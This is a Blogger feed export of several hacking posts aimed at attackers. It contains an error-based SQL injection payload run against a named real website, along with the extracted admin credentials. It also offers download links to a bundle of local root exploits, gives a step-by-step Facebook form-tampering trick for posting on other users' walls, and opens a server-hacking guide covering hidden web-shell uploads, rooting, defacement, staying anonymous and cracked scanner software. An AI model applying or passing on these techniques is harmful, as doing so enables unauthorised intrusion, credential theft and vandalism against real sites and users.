<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user name,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Notice how I didn't increment the mid() function</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">This because the content is completely shown</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-style: italic; margin: 0px; padding: 0px;">Note: You can know that the data is completely shown when there is a <span style="margin: 0px; padding: 0px;"><span style="font-weight: bold; margin: 0px; padding: 0px;">~</span></span> sign or signs</span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot:</span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: 057wa.png]" border="0" height="399" src="http://i.imgur.com/057wa.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-83610302788130256082013-09-04T22:56:00.000-07:002013-09-04T22:56:21.226-07:00All Local Root Exploits 2005 - 2013 + Auto Rooter !<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="background-color: white; color: rgb(2, 187, 114) !important; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 24px; line-height: 28px; margin-bottom: 15px; text-align: center; text-transform: capitalize;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP4L8Wjqa7-2iV9QZEtTZB9iYgudrIKKjDiE8Ta9KqQiWb89ruBYr5yjDn5ibHvejYUTJG7Y7btuoHCextw1S0BOLakApO3JO3vkGo-yq-_QJcSGJsehKxShDNeTEDI3PZS9op46Pd0aQ/s640/hackers+cover+photos+by+www.kidsec.com.jpg" /></h2>
<h2 style="background-color: white; color: rgb(2, 187, 114) !important; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 24px; line-height: 28px; margin-bottom: 15px; text-align: center; text-transform: capitalize;">
All Kernels Has Been Exploited - Ultimate Local Roots Collection XD</h2>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">hey guys whats up ? tired of searching local roots again and again ?</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">well your problem is solved now :D</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">i have something for you , ultimate collection of all local roots !</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">ok , what you will get in this collection ?</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">================================</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif;"><b><span style="color: lime;"><span style="line-height: 18px; text-align: left;">-2006</span><br style="line-height: 18px; text-align: left;" /><span style="line-height: 18px; text-align: left;">2007</span><br style="line-height: 18px; text-align: left;" /><span style="line-height: 18px; text-align: left;">2008</span><br style="line-height: 18px; text-align: left;" /><span style="line-height: 18px; text-align: left;">2009</span></span><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: lime;"><br />2010<br />2011- By H4x0rl1f3 Our Bro !</span><br /><span style="color: red;">-2.6.18 2012</span><br /><span style="color: red;">2.6.32 2012 and 2013 - By My Bro Abdul Ghaffar Aka gujjar Haxor PCP</span><br /><span style="color: lime;">FreeBSD 7,7.1,8 The Rest By </span></span></b></span><span style="background-color: #f7f7f7; font-size: 12px; line-height: 15px; text-align: left; white-space: pre-wrap;"><span style="color: lime; font-family: 'Trebuchet MS', sans-serif;"><b>Ch3rn0by1 From PMH!</b></span></span><span style="font-family: 'Trebuchet MS', sans-serif;"><b><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><br /><span style="color: red;">Autoroot 2011 And 2012 And 2013</span><br /><span style="color: red;">And Also Windows NT User Privilege Escalation</span></span></b></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: blue; font-family: 'Trebuchet MS', sans-serif;"><b>Some Of Them Are Compiled ;D</b></span></span><br /><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: blue; font-family: 'Trebuchet MS', sans-serif;"><b>Download Compiled Mempodiper Exploit From Below</b></span></span><br /><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: blue; font-family: 'Trebuchet MS', sans-serif;"><b><a href="https://www.facebook.com/ajax/messaging/attachment.php?attach_id=b4600151a097296c4f4e81a1473ad9d7&mid=mid.1377372913261%3Aef8092a45aceb01374&hash=AQBSkXqfw9fppt3N" style="-webkit-transition: all 0.2s ease-in-out; color: #2dcb73; outline: none; transition: all 0.2s ease-in-out;" target="_blank">HERE</a></b></span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 18px;">======================================</span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 18px;"><br /></span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 18px;">Finally , Below You'll Get The Link :D</span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif; font-size: medium;"><span style="line-height: 18px;"><a href="http://www.mediafire.com/?8i4f6v5b343fe2s" style="-webkit-transition: all 0.2s ease-in-out; color: #2dcb73; outline: none; transition: all 0.2s ease-in-out;" target="_blank">Mediafire Link</a></span></span></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com1tag:blogger.com,1999:blog-3265662506015756178.post-81279282620428508902013-09-04T22:51:00.001-07:002013-09-04T22:51:46.818-07:00Facebook exploit tutorial done By khalil<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; color: #333333; font-family: Arial, serif; font-size: 14px; line-height: 22.875px;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Apparently this got patched before I could release this... I'll let it stay here so you can read something I made.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Sorry.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Hey guys! I recently saw a thread on another forum on how to do exploit.<br /><br /><span style="font-size: medium;">What this exploit is about</span></span></span><br style="color: #333333; font-family: Arial, serif; font-size: 14px; line-height: 22.875px;" /><span style="background-color: white; color: #333333; font-family: Arial, serif; font-size: 14px; line-height: 22.875px;"><span style="font-family: Verdana, Arial, sans-serif; line-height: 18px;"><span style="font-size: medium;"><br /></span><span style="font-size: xx-small;">When you make a new status on Facebook, the default value of making a status is set to your profile. By changing a single value, you will be able to make a post on any wall you want.</span><br /><br /><span style="font-size: small;">Step 1</span><br /><span style="font-size: xx-small;">Open Facebook, write a status message but don't submit it.</span><br /><br /><span style="font-size: small;">Step 2</span><br /><span style="font-size: xx-small;">Open the profile you wish to make a post on, and copy the username, or ID, right after the facebook.com part. Example:</span><br /><br /><a href="http://www.facebook.com/zuck" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://www.facebook.com/zuck</a><br /><span style="font-size: xx-small;">Copy zuck and put it after this URL: </span><a href="http://graph.facebook.com/" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://graph.facebook.com/</a><br /><br /><a href="http://www.facebook.com/zuck" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://www.facebook.com/zuck</a><span style="font-size: xx-small;"> -> </span><a href="http://graph.facebook.com/zuck" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://graph.facebook.com/zuck</a><br /><br /><span style="font-size: small;">Step 3</span><br /><span style="font-size: xx-small;">Go back to your Facebook status, and open Google Developer (F12) or Inspect Element (Firefox) and click on the status, like this:</span><br /><span style="font-size: xx-small;"><img alt="[Image: 46uhJ.png]" border="0" height="73" src="http://puu.sh/46uhJ.png" style="border: none; padding: 2px;" width="400" /></span><br /><br /><span style="font-size: small;">Step 4</span><br /><span style="font-size: xx-small;">Scroll up, till you find an input-tag with name set to "xhpc_targetid". It looks like this:</span><br /><span style="font-size: xx-small;"><input type="hidden" autocomplete="off" name="xhpc_targetid" value="12345"></span><br /><br /><span style="font-size: small;">Step 5</span><br /><span style="font-size: xx-small;">Go back to the graph.facebook.com tab you opened before, and copy the ID. It looks like this:</span><br /><span style="font-size: xx-small;"><img alt="[Image: 46unu.png]" border="0" src="http://puu.sh/46unu.png" style="border: none; padding: 2px;" /></span><br /><span style="font-size: xx-small;">In that case, the ID would be 4.</span><br /><br /><span style="font-size: small;">Step 6</span><br /><span style="font-size: xx-small;">Go back to your Facebook status, and replace the value="xxx" (from step 4) to your new ID. Example:</span><br /><br /><span style="font-size: xx-small;"><input type="hidden" autocomplete="off" name="xhpc_targetid" value="12345"></span><br /><span style="font-size: xx-small;">changed to:</span><br /><span style="font-size: xx-small;"><input type="hidden" autocomplete="off" name="xhpc_targetid" value="4"></span><br /><br /><span style="font-size: xx-small;">Once that is done, all you need to do now is press "Post". Your post will now be posted on the target's Facebook wall!</span><br /><br /><span style="font-size: xx-small;">Enjoy</span></span></span></div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-73920557709587232822013-09-04T22:50:00.001-07:002013-09-04T22:50:22.578-07:00How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.8em; font-weight: normal; line-height: 1em; margin: 30px 0px 0px; padding: 0px 0px 9px; text-align: right; vertical-align: baseline;">
<span style="background-color: white; border: 0px; color: #3b3b3b; font-family: inherit; font-size: 34px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Tutorial on Web Hacking by Akatzbreaker</span></h2>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Web-Hacking is a huge topic that I could easily discuss for hours.</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">So, today I decided to make a good start by creating this post-tutorial: <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">How to Hack a Server</span></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Everything you need to know….</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span id="more-636" style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Tools you need:</span></h3>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Backtrack (<a href="http://www.backtrack-linux.org/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Backtrack Linux">Backtrack Website</a>)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Firefox (get it from <a href="http://www.mozilla.org/en-US/firefox/new/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Download Firefox | Mozilla">here….</a>) – Included in Backtrack and Ubuntu</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Netcat (Included in Backtrack) — If you are on other linux enviroments get it from <a href="http://nmap.org/ncat/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Netcat | Nmap.org">here….</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- iCon2PHP (Get it from <a href="http://gnahackteam.wordpress.com/gnahackteam/icon2php/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="iCon2PHP | Created by Akatzbreaker">here….</a>)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- A good shell (iCon2PHP Archive includes three great shells)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- A good VPN or Tor (More explanation below…..)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Acunentix Web Vulnerability Scanner (Search for a cracked version at <a href="http://www.hackforums.net/showthread.php?tid=2237088&highlight=Acunetix" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Acunetix Web-Vulnerability Scanner | Cracked - Hackforums.net">Hackforums.net</a>)</span></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">About the Tools:</span></h3>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Backtrack</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(<span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Just a little tip:</span> To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)</em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Firefox</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox <a href="http://gnahackteam.wordpress.com/2012/02/29/the-five-greatest-firefox-tools-for-hacking/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="The Five Greatest Firefox Tools for Hacking!">Here….</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Netcat</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Netcat is a powerful networking tool. You will need this to root the server….</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">iCon2PHP & Good Shells</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Good VPN or TOR (Proxies are good too…)</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is <a href="http://proxpn.com/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="ProXPN">ProXPN</a>. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">What I would recommend</span> is <a href="http://www.torproject.org/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="TOR | Anonymity Online">Tor</a>. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Apart from Tor, simple Proxies are good but I <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">wouldn’t recommend</span> them as much as I would for Tor.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"> <strong>— If I listed the above options according to their reliability : </strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">1. Paid VPN Account at ProXPN</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">2. Tor</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">3. Free VPN Account at ProXPN</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">4. Proxy Connection</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Acunetix Web Vulnerability Scanner</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">The Consultant Edition (For unlimited websites) costs about 3000-7000$.</em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<strong style="background-color: white;">____________________________________________________________</strong></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Starting the Main Tutorial:</span></h3>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">So, here is the route we will follow:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Find a Vulnerable Website –> Upload a c100 Shell <em style="border: 0px; font-family: inherit; font-weight: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(Hidden in an Image with iCon2PHP)</em> –> Rooting the Server –> Defacing the Website –> Covering your Tracks</strong></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">- – - Before we begin – - -</span></h4>
